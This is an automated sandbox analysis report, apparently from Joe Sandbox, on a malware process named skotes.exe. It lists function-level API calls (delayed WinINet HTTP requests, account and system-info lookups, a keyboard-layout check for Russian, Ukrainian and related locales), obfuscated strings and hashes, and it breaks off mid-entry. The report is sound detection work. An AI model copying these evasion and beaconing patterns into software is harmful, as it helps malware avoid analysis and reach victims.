Function 054506F0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7400e698c586c262691f16dcdfde05da6c072c61a6ab3aa6642e65de559d0de
Instruction ID: d95a0743044ff016c9687d4983470b6388334b9dab9ee2b422aea783697ed99b
Opcode Fuzzy Hash: b7400e698c586c262691f16dcdfde05da6c072c61a6ab3aa6642e65de559d0de
Instruction Fuzzy Hash: F8E065FF21D1656D7150E0962B5C9F7235ED0C1731735C827F846C6143D259498B9536

Analysis Process: skotes.exePID: 6768, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	11.4%
Total number of Nodes:	352
Total number of Limit Nodes:	10

Executed Functions

Function 00F6BE30 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000005DC), ref: 00F6BEB8
InternetOpenW.WININET(00FB8DC8,00000000,00000000,00000000,00000000), ref: 00F6BEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F6BEEC
HttpOpenRequestA.WININET(?,00000000), ref: 00F6BF36
HttpSendRequestA.WININET(?,00000000), ref: 00F6BFF6
InternetReadFile.WININET(?,?,000003FF,?), ref: 00F6C0A8
InternetCloseHandle.WININET(?), ref: 00F6C187
InternetCloseHandle.WININET(?), ref: 00F6C18F
InternetCloseHandle.WININET(?), ref: 00F6C197

Strings

stoi argument out of range, xrefs: 00F6E4EA
8HJUeIfzLo==, xrefs: 00F6C3CB, 00F6C623
8HJUeMD Lq5=, xrefs: 00F6C465
RmNn, xrefs: 00F6D606
RE1NXF==, xrefs: 00F6BF0E
invalid stoi argument, xrefs: 00F6E4F4

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-2254971868
Opcode ID: 5ff6d7d7b0d5cfe388b5e864077a6341fd6615b5708663e0c704f6fbefd16c98
Instruction ID: 0d80fde6acb58bb71449cfbb93bb6778b3d98346fba1acec50d25cfcd75fe1b6
Opcode Fuzzy Hash: 5ff6d7d7b0d5cfe388b5e864077a6341fd6615b5708663e0c704f6fbefd16c98
Instruction Fuzzy Hash: 8CB116B1A001189BEB24CF28CC85BEE7B75EF41304F5081A9F948972D2DB759AC4DF95

Function 00F665E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00F66680

Strings

GSTmfV==, xrefs: 00F66728
RySfdMLx, xrefs: 00F6669C
ISNmfV==, xrefs: 00F667D1

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GSTmfV==$ISNmfV==$RySfdMLx
API String ID: 1484870144-2309319047
Opcode ID: 29f02df39588ba55130a0eb0317bdec838532f6021ed4ee5856484579243fe11
Instruction ID: d919a138b225c25a2ac3182d1d787b26ed84899bd0b4df004b1b8bca4f32a31d
Opcode Fuzzy Hash: 29f02df39588ba55130a0eb0317bdec838532f6021ed4ee5856484579243fe11
Instruction Fuzzy Hash: 3191C0B1A001189BDB28DB28CC85BEDB779EF45304F4085EDE519E7282DA349BC4DFA5

Function 00F747B0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2516COMMON

Download Yara Rule

APIs

Part of subcall function 00F77A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00F77AEC
Part of subcall function 00F77A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00F77AF8
Part of subcall function 00F77A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00F77B01

Part of subcall function 00F6BE30: Sleep.KERNELBASE(000005DC), ref: 00F6BEB8
Part of subcall function 00F6BE30: InternetOpenW.WININET(00FB8DC8,00000000,00000000,00000000,00000000), ref: 00F6BEC8
Part of subcall function 00F6BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F6BEEC
Part of subcall function 00F6BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00F6BF36

std::_Xinvalid_argument.LIBCPMT ref: 00F74F92

Strings

Vmc0, xrefs: 00F755D7
jS=, xrefs: 00F76513, 00F767E2
stoi argument out of range, xrefs: 00F74359, 00F74F9C
93E0, xrefs: 00F75600
aWW0, xrefs: 00F7555C
Fw==, xrefs: 00F7378E, 00F74E1D
9c9aa5, xrefs: 00F75619
KCWUOl==, xrefs: 00F75649
MGE+, xrefs: 00F74866, 00F748DD, 00F74B85, 00F74BFC
anE0, xrefs: 00F7566B
9HQ0, xrefs: 00F754E1
9250, xrefs: 00F754AD
MGI+, xrefs: 00F748AD, 00F749DC, 00F74BCC, 00F74CFB
GE0, xrefs: 00F75585
3I3eB==, xrefs: 00F74802
8WI0, xrefs: 00F75692
VXA0, xrefs: 00F755AE
2I0, xrefs: 00F75627
VXQ0, xrefs: 00F7550A
WGS0, xrefs: 00F75533
246122658369, xrefs: 00F7502A, 00F7503D, 00F7507F, 00F75089, 00F75684

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
API String ID: 4201286991-1982281295
Opcode ID: 908915080f2d46ff7272fcb2922e8646173ee70b245322ea727941332def6c28
Instruction ID: e9ca08bd0bca9e7132eb981871d869223794aee2332b90db04c41e3c7ce4fa6b
Opcode Fuzzy Hash: 908915080f2d46ff7272fcb2922e8646173ee70b245322ea727941332def6c28
Instruction Fuzzy Hash: 72233371A002588BEB19DB28CD89B9DBB76AF81304F54C1D9E00CA72C2DB795F84DF52

Function 00F65EE0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 00F6612B
00000423, xrefs: 00F660FA
00000422, xrefs: 00F660C9
00000419, xrefs: 00F66098
Keyboard Layout\Preload, xrefs: 00F66054

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 9d24ef05906e8520c5bc73d392f77f0765dae3ffcf754c7e164f3d7e67cba21e
Instruction ID: ec0389c7e7a9b69cb644b6daa26fa24370daab7e7b9e6d68aed444ce3d9076b2
Opcode Fuzzy Hash: 9d24ef05906e8520c5bc73d392f77f0765dae3ffcf754c7e164f3d7e67cba21e
Instruction Fuzzy Hash: AAD1CD71900218ABEB24DF24CC89BDEB7B9AF04340F5442D9E409E7291DB74AEA49F95

Function 00F67D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F67ED3

Strings

JjssOl==, xrefs: 00F6813A
JjssPV==, xrefs: 00F681E2
JjsrPl==, xrefs: 00F6828A
JjsrQV==, xrefs: 00F68092

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
API String ID: 1721193555-3123340372
Opcode ID: 4b1229c8dfdac89c3e8a14ee481c83371a2f3f1bcbb2f2d50d4b2dc46d649f8c
Instruction ID: a7a77757425d466ef55aad9d6fe79689ee2bafe7d3c5f4c76418020b37802c01
Opcode Fuzzy Hash: 4b1229c8dfdac89c3e8a14ee481c83371a2f3f1bcbb2f2d50d4b2dc46d649f8c
Instruction Fuzzy Hash: 64E10471E002449BDF24BB28CD1B79D7B71AB41724F94429CE4196B3C2DB398E95ABC3

Function 00F9D634 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8d2815bc2b38d7ee7be00df7534119ed9b86ef9d95154147aa6b29af1b4546
Instruction ID: 1ad8ab873c67edca9e6f2fab82de2d840feb913a025f55081c6df3a3425d5bc5
Opcode Fuzzy Hash: 8d8d2815bc2b38d7ee7be00df7534119ed9b86ef9d95154147aa6b29af1b4546
Instruction Fuzzy Hash: ED61F532D002148FFF25EFA8D8957EDB7B0EB55320F38411AE859A7291D6359C00AB62

Function 00F68380 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00F68524

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 561e37248fbe149d9b83b84415af2550974d6c15f9f32026aed97d0277eebe9e
Instruction ID: 04817d0ac6241585bbb353ea6ce7a20e83d4a2e25ccc7121f22a244ac54e1a17
Opcode Fuzzy Hash: 561e37248fbe149d9b83b84415af2550974d6c15f9f32026aed97d0277eebe9e
Instruction Fuzzy Hash: F7512371D102089BEB24EB28CD49BDDB775EB45320F5043ADE809A7281EF359EC19B92

Function 00F9D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00F9A72D,?,?,?,00F9666A,?,00F66F28,00000000,00000000,88B68CA5), ref: 00F9D871

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ce3491054e4c15254d3ef10b772642b48a6e39abb7d39298c51b5c47098e8d4
Instruction ID: e661308ea8e952be40fda792d12308dbb3632bad9a88df01814454e0e8396c16
Opcode Fuzzy Hash: 1ce3491054e4c15254d3ef10b772642b48a6e39abb7d39298c51b5c47098e8d4
Instruction Fuzzy Hash: 16F0E232E4522466FF213A769C05B9B3759DF853B0B398022ED08A7183DA20EC01B2E0

Function 00F76C70 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00F76CF5

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7f742f939edf490a00bca573ead1b3c1a63f359ac90a6d46ee86715bc3685c4c
Instruction ID: 482fcae062a350baa1497f639f7c5096fb55a459c6983f9662d3a415d90a72dc
Opcode Fuzzy Hash: 7f742f939edf490a00bca573ead1b3c1a63f359ac90a6d46ee86715bc3685c4c
Instruction Fuzzy Hash: 32F0F971A00604A7CB117B789D03F1E7B74EB06B60F804359E415772D1EB786A04A7D3

Function 052D01C4 Relevance: .0, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3483903750.00000000052D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_52d0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc422e43e92e91d030b2f24514a1641a1ba30ebec6037cff33782d80288b8e6
Instruction ID: ccf593c5ef320b3f47aa491e9e4988817fd52cb7273e39280750cc267b161e29
Opcode Fuzzy Hash: 3cc422e43e92e91d030b2f24514a1641a1ba30ebec6037cff33782d80288b8e6
Instruction Fuzzy Hash: B7F0277347F1229E9310D161156C5BFE25BADE5310F71842FF042C3425F389D6469132

Non-executed Functions

Function 00F6E530 Relevance: 14.7, Strings: 11, Instructions: 998COMMON

Download Yara Rule

Strings

WTw=, xrefs: 00F7097D
GnNoc2Hc, xrefs: 00F6E56C
#, xrefs: 00F70624
WDw=, xrefs: 00F6F71D, 00F6F9FA
WTs=, xrefs: 00F705CA
MQ==, xrefs: 00F6E592
111, xrefs: 00F6F7A0
UA==, xrefs: 00F6EB0F, 00F6ED56
246122658369, xrefs: 00F6F737, 00F6FA14, 00F705E7, 00F7099A
9c9aa5, xrefs: 00F6FB8E
MGE+, xrefs: 00F6E821

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
API String ID: 0-2571795437
Opcode ID: d790bcffd7cccc5a2a17bc002417a9c05b71b6770230d4b319241e4371f23b47
Instruction ID: 4a703d6ec62ea75e1360a8bff8ebe084c91ecf0d5d1405f3e551887c5fef6552
Opcode Fuzzy Hash: d790bcffd7cccc5a2a17bc002417a9c05b71b6770230d4b319241e4371f23b47
Instruction Fuzzy Hash: BF82E2709142889BEF14EF68CD497CE7FB6AF41304F508199E809673C2D7799A88DBD2

Function 00FA31A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00FA3323

Strings

1#QNAN, xrefs: 00FA44C1
1#SNAN, xrefs: 00FA44BA
1#IND, xrefs: 00FA44B3
1#INF, xrefs: 00FA44DE

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 179f43bf7dc488b8c6fb2afc698fee60af60cbee9e70b22bbf2e69ab58504981
Instruction ID: c1bdacded43f6e2cb7d0a82364a389afade6f7f5618c5013b1552ca27411c59d
